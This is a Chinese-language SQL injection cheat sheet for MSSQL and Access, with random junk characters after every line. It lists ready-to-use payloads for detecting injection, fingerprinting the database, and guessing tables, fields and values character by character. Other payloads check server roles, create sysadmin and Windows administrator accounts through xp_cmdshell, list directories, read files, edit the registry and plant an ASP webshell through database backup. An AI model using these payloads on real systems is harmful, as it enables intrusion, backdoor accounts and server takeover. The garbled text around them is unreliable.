1.判断是否有注入;and 1=1 ;and 1=2 irg%n
2.初步判断是否是mssql ;and user>0 I/F3%'O
IaDN[:SX
3.注入参数是字符'and [查询条件] and ''=' ;>#YOxPl
Re`'dde=
4.搜索时没过滤参数的'and [查询条件] and '%25'=' l]pHj4`uv
"YUh4uZ~P
5.判断数据库系统 6Dx^$=Sa$
!KYX\HRW
;and (select count(*) from sysobjects)>0 mssql fu}ZOPu
!N, Oe<
;and (select count(*) from msysobjects)>0 access h[%t7qo=
*G]zN "Y
K6C@YY(
rD7L==Ld
6.猜数据库 ;and (select Count(*) from [数据库名])>0 F_Pv\?35z
D7|=ev
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ENmfbJ4d~
_[eAA4h
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 3,x|w
zcn> 4E)
9.(1)猜字段的ascii值(access) !!jitFHzb
@U~i<kt
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Qxw?D4/Y
~Ogtgr
(2)猜字段的ascii值(mssql) >4c7r~\k
YlF<S49loC
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }ZP;kM$g
=vqy5y
10.测试权限结构(mssql) m1](f[$
n0/H2>I[
~E]ct F
0`{3|g
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- R:Pw@
"ggViIOw&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- jbDap i<
X {["4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \.@fAgv
@xO?SjH
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
PT`];C(he
C4Tn
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- %[l*:05
iyj,0T
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /b44;U`v5-
nBVR)|+M
;and 1=(select IS_MEMBER('db_owner'));-- k|O?qE1hP
6m=FWw3y
?iX1;c9
d]kP@flOV
11.添加mssql和系统的帐户 x_C#ALq9
#/UlW
;exec master.dbo.sp_addlogin username;-- zF%'~S0{
;exec master.dbo.sp_password null,username,password;-- c*5y8k
NI@$"
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- i?*_-NAm
SkmL X@:(
;exec master.dbo.xp_cmdshell 'net user username password Hy?+p{{G
sSh=Idrx
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fs43\m4=m
fn!(cE|`E
;exec master.dbo.xp_cmdshell 'net user username password /add';-- (Wj2%*NT
|L@9qwF
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- dzK]F/L]
X5(S+;v"^
s+=JT+g
\Y EV
5
12.(1)遍历目录 w6^X*tE
L>,j*a_[
;create table dirs(paths varchar(100), id int) __FhuP P
oX2J2O
;insert dirs exec master.dbo.xp_dirtree 'c:\' :3FJe
[i8,rOa7
;and (select top 1 paths from dirs)>0 C*S%aR
<hYrcOt
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) r N"P
IH
i$Rlb5RU
5M.KF;P
c:a5pd7T
(2)遍历目录 S`!MoIMsD
!'-|]xx(
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :+Pl~X"_
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @.4e^Km
7_AR()CM
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |;L%hIR[
0(uNFyIG
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 m &U
$V
6.%V"l
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2n9E:tc
)u. ut8![T
`=]I-5#.W
P5:X7[
13.mssql中的存储过程 ,W'?F9Y\
. PzlhTL7
xp_regenumvalues 注册表根键, 子键 &DqeO8?Q
VTDp9s
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 =Yxu {]G
/r4QDwu
xp_regread 根键,子键,键值名 (z[|\6O
Jy,Dcl
;exec xp_regread 7VP[U,
Lv;R8^n
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 "TWNit
t^|+|>S
xp_regwrite 根键,子键, 值名, 值类型, 值 c`'2
lgxG:zAC
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0FDfB;
Q%xvS,oI
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 :Sh>
^JDiI7
xp_regdeletevalue 根键,子键,值名
+["t@Q4IQ
pg}9baW?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 GC{)3)_ t
e3+'m
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 zh hHA9
{9 >jWNx
))M; .b.D
[:HT=LX3
14.mssql的backup创建webshell [Z3B~c
9(%ptnya
use model 2:(h17So
7Y:~'&U|
create table cmd(str image); y<|vcg8x
|%F[.9Dp
insert into cmd(str) values (''); }gE?ms4$
! H)D@,@ &
backup database model to disk='c:\l.asp'; wvAXt*R
Td&w
LB<,(dyh
*$ZLu jy7
15.mssql内置函数 d7xd"
x,Im%!h
;and (select @@version)>0 获得Windows的版本号 4\%0a,\^
+L4_]
;and user_name()='dbo' 判断当前系统的连接用户是不是sa VP4W~;UV|\
kaxAIk8l
;and (select user_name())>0 爆当前系统的连接用户 pN+lC[C
?#F}mOVAa
;and (select db_name())>0 得到当前连接的数据库 8oI)q4V
,+0>p
Z8\c'xN
sR`WV6!9
16.简洁的webshell Xa._
kLKd
O0
use model lNSB "S
em@\S
create table cmd(str image); lY5a=mwHU
I!y[7^R
insert into cmd(str) values (''); u$c)B<.UR
sa%2,e'
backup database model to disk='g:\wwwtest\l.asp';